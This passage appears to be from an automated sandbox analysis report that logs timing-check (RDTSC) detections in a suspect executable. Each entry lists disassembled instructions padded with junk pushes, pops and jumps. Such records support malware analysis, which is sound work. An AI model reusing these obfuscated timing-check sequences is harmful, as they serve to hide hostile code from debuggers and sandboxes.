Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF4FE second address: 10AF51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDAECF second address: FDAEDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC85D338E26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B745C second address: 10B7461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7461 second address: 10B746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC85D338E26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B746D second address: 10B7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC85CDF02A8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7482 second address: 10B7486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7486 second address: 10B748C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B748C second address: 10B7491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7491 second address: 10B7499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7499 second address: 10B74A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C30D3 second address: 10C30D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C30D9 second address: 10C30DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC124 second address: 10CC12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC12A second address: 10CC13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jno 00007FC85D338E52h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC13A second address: 10CC140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CADD9 second address: 10CADF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FC85D338E34h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CADF8 second address: 10CAE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jc 00007FC85CDF02B4h 0x00000013 jmp 00007FC85CDF02AEh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC85CDF02AFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CF5B0 second address: 10CF5CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077C6 second address: 11077D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077D1 second address: 11077EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077EA second address: 11077EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099A3 second address: 11099A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099A9 second address: 11099ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85CDF02A6h 0x00000008 jnp 00007FC85CDF02A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC85CDF02B9h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC85CDF02B0h 0x0000001f jc 00007FC85CDF02A6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099ED second address: 11099FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099FB second address: 1109A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109A05 second address: 1109A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109A09 second address: 1109A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B4h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111B096 second address: 111B0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111B0A0 second address: 111B0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DC3 second address: 11E0DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DC7 second address: 11E0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DCD second address: 11E0DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DE7 second address: 11E0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E14E1 second address: 11E150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jnl 00007FC85D338E26h 0x0000000e jne 00007FC85D338E26h 0x00000014 jnc 00007FC85D338E26h 0x0000001a popad 0x0000001b jmp 00007FC85D338E2Dh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E150C second address: 11E1512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1840 second address: 11E187A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC85D338E35h 0x0000000c jmp 00007FC85D338E2Fh 0x00000011 popad 0x00000012 jl 00007FC85D338E32h 0x00000018 jo 00007FC85D338E2Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19DA second address: 11E19DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19DE second address: 11E19EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC85D338E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19EA second address: 11E19F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19F4 second address: 11E19F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19F8 second address: 11E19FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19FE second address: 11E1A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1A08 second address: 11E1A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E475A second address: 11E4770 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC85D338E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4770 second address: 11E4775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E49AB second address: 11E49B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E49B1 second address: 11E49B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4D22 second address: 11E4DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC85D338E35h 0x0000000a jns 00007FC85D338E26h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC85D338E28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push dword ptr [ebp+12456B32h] 0x00000035 ja 00007FC85D338E33h 0x0000003b call 00007FC85D338E29h 0x00000040 jmp 00007FC85D338E39h 0x00000045 push eax 0x00000046 js 00007FC85D338E34h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DAA second address: 11E4DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DAE second address: 11E4DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DBC second address: 11E4DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85CDF02B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DDC second address: 11E4DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC85D338E26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DF4 second address: 11E4DFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B67 second address: 11E7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B6D second address: 11E7B77 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC85CDF02A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B77 second address: 11E7B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B82 second address: 11E7B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FC85CDF02A6h 0x0000000c jmp 00007FC85CDF02ABh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10FF second address: 73C1151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e jmp 00007FC85D338E36h 0x00000013 mov dword ptr [edx+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC85D338E37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1151 second address: 73C1157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1157 second address: 73C115B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C115B second address: 73C11C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02ADh 0x00000012 xor eax, 64E1B636h 0x00000018 jmp 00007FC85CDF02B1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [edx+08h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC85CDF02AFh 0x0000002b adc ecx, 28A0F36Eh 0x00000031 jmp 00007FC85CDF02B9h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C11C6 second address: 73C11CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C11CB second address: 73C121E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d call 00007FC85CDF02B4h 0x00000012 call 00007FC85CDF02B2h 0x00000017 pop esi 0x00000018 pop edx 0x00000019 mov ch, 70h 0x0000001b popad 0x0000001c mov dword ptr [edx+0Ch], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov si, dx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C121E second address: 73C1290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+10h] 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e mov esi, 5ED719BBh 0x00000013 popad 0x00000014 mov dword ptr [edx+10h], eax 0x00000017 jmp 00007FC85D338E2Eh 0x0000001c mov eax, dword ptr [esi+14h] 0x0000001f jmp 00007FC85D338E30h 0x00000024 mov dword ptr [edx+14h], eax 0x00000027 pushad 0x00000028 call 00007FC85D338E2Eh 0x0000002d mov ah, DCh 0x0000002f pop ebx 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+18h] 0x00000036 jmp 00007FC85D338E36h 0x0000003b mov dword ptr [edx+18h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1290 second address: 73C12AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12AD second address: 73C12B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12B3 second address: 73C12B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12B7 second address: 73C12BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C12BB second address: 73C1354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02B5h 0x00000012 sbb ecx, 54760D46h 0x00000018 jmp 00007FC85CDF02B1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC85CDF02B0h 0x00000024 sbb si, 79E8h 0x00000029 jmp 00007FC85CDF02ABh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+1Ch], eax 0x00000033 pushad 0x00000034 mov dh, ch 0x00000036 pushfd 0x00000037 jmp 00007FC85CDF02B1h 0x0000003c sbb si, 7006h 0x00000041 jmp 00007FC85CDF02B1h 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+20h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push edi 0x0000004f pop esi 0x00000050 movsx edx, si 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1354 second address: 73C1383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c jmp 00007FC85D338E2Eh 0x00000011 mov eax, dword ptr [esi+24h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1383 second address: 73C1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1387 second address: 73C13A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C13A4 second address: 73C1443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02ACh 0x00000013 sbb eax, 620235C8h 0x00000019 jmp 00007FC85CDF02ABh 0x0000001e popfd 0x0000001f call 00007FC85CDF02B8h 0x00000024 mov edx, ecx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [esi+28h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC85CDF02B3h 0x00000032 jmp 00007FC85CDF02B3h 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [edx+28h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC85CDF02B7h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1443 second address: 73C1447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1447 second address: 73C144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C144D second address: 73C1484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 4Ah 0x00000005 call 00007FC85D338E37h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [esi+2Ch] 0x00000011 pushad 0x00000012 call 00007FC85D338E31h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1484 second address: 73C14AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [edx+2Ch], ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b mov ecx, edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov ax, word ptr [esi+30h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC85CDF02B3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14AC second address: 73C14D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E2Fh 0x00000009 jmp 00007FC85D338E33h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14D5 second address: 73C14E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov word ptr [edx+30h], ax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14E6 second address: 73C14EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14EA second address: 73C14F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C14F0 second address: 73C153A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d pushad 0x0000000e call 00007FC85D338E2Dh 0x00000013 jmp 00007FC85D338E30h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov word ptr [edx+32h], ax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C153A second address: 73C1540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1540 second address: 73C15CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d mov esi, 6E1C8693h 0x00000012 mov esi, 1E7EF8EFh 0x00000017 popad 0x00000018 mov dword ptr [edx+34h], eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d mov esi, edx 0x0000001f pop edx 0x00000020 call 00007FC85D338E38h 0x00000025 call 00007FC85D338E32h 0x0000002a pop esi 0x0000002b pop edi 0x0000002c popad 0x0000002d test ecx, 00000700h 0x00000033 pushad 0x00000034 mov dl, al 0x00000036 mov eax, ebx 0x00000038 popad 0x00000039 jne 00007FC8CC1B6F94h 0x0000003f pushad 0x00000040 pushad 0x00000041 mov bx, 153Eh 0x00000045 push edx 0x00000046 pop esi 0x00000047 popad 0x00000048 popad 0x00000049 or dword ptr [edx+38h], FFFFFFFFh 0x0000004d push eax 